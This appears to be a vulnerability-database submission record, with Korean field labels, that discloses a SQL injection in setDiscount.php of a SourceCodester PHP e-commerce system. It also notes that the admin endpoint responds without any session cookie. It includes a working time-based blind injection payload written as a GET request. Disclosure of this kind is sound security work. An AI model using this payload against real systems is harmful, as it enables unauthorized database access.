| 제목 | E-Commerce System setDiscount.php SQL Injection Vulnerability |
|---|
| 설명 | E-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id
A time-based blind poc is below:
GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1
And server will also response even if there's no cookie in the header, which is an improper access control. |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 20. AM 08:07 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 20. AM 08:33 (26 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223409 [SourceCodester E-Commerce System 1.0 setDiscount.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|